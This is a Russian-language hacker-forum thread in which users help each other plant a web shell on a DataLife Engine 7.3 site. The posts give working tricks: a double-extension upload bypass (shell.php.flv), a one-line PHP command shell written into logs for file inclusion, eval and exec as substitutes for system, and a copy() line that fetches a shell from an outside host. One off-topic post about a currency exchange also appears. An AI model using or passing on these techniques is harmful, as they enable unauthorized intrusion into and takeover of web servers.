Ваши вопросы по уязвимостям.

испортил логи терь над ждать пока ошибка исчезнет)

 

заливка шела в дле

Есть доступ к dle админке, версия 7.3.

Включил возможность добавлять файлы, но к новости так прикрепить и не смог.

Да и если бы получилось, то насколько я понимаю и проверил, папка /uploads/files/ защищена .htaccess:

PHP:

<FilesMatch ".*">
   Order allow,deny
   Deny from all
</FilesMatch>

<FilesMatch "\.(avi|mp3|mp4|flv|swf|wmv)$|^$">
   Order deny,allow
   Allow from all
</FilesMatch>

Какие есть способы залить шел?

 

Тут вчера сидел в нете и решил перевести WME в яндекс.Деньги
нашол обменник
и выбрал случайно не WME а WMU, написал 10 и оплатил, ток потом дошло что я не ту валюту выбрал и кошелька у мну такого нет, при обновлении страницы у мну на яндексе светились деньги, а в WM появился кошелек WMU с 0 денежных средств
Кто нить вкурсах что это было?

 

пробуй shell.php.flv

 

Можно попробовать закомментировать оставшуюся часть, к примеру на локале у меня такое пашет:

PHP:

<?php
system('dir');
die();/*
<?php 
system(; 
?>


Ругается конечно, но работает.

 

А что это даст, он же не будет интерпретироваться как пхп..

 

Если апач с mod_mime, то будет

 

хорошо, спасибо, попробую.. просто как добавлять новости с файлом я тоже найти не могу..

Да и ещё там будет номер из цифр пяти-шести перед файлом, его тоже узнать как-то надо. =)

Ладно, буду пробывать, спасибо за эту инфу.

 

Наверно стоило бы уточнить что сначало надо соответствуюший AddType(AddHandler) добавить - а то сейчас человека можно запутать.

 

Наоборот, хендлер для .flv НЕ должен быть прописан.

 

записал в лог <?php system($_GET[cmd]); ?> хотел копировать в tmp а потом уже инклудить,но опять ошибка))
Parse error: syntax error, unexpected '['
как это закомментировать?

 

Пиши в лог

PHP:

<?php system($_GET[cmd]);/*

Но лучше вместо system - eval, он заработает, если system запрещён.

 

уже пробовал eval ,undefind function
system не запрещен,в логе ls уже выполнилось

 

Попробуй exec вместо eval.

 

это timestamp, запоминай время заливки файла переводи в unixtime и напиши брутер который который этот timestamp подберет, только вот из-за .htaccess наверное ничего не выйдет с шеллом

 

Насколько я знаю, шестизначный timestamp был еще в 1970 году.
А сейчас десять знаков в timestamp'e.

 

По крайней мере в 6-ой ветке был именно timestamp в качестве префикса

 

вобщем могу выполнять команды через php include+логи,как можно залить норм шелл?
<?php include("http://site/nstview.txt"); ?> не прокатило,wget curla нету(смотрел в /bin/)
если в reffer вставить норм шелл,прокатит?
_____
Попробовал через reffer не получилось.Все залил там был wget,лежал не в bin

 

<?php copy('http://site.gov/shell.txt', 'shell.php');?>

 

А в какой каталог он скопирует файл? Может надо полный путь указать?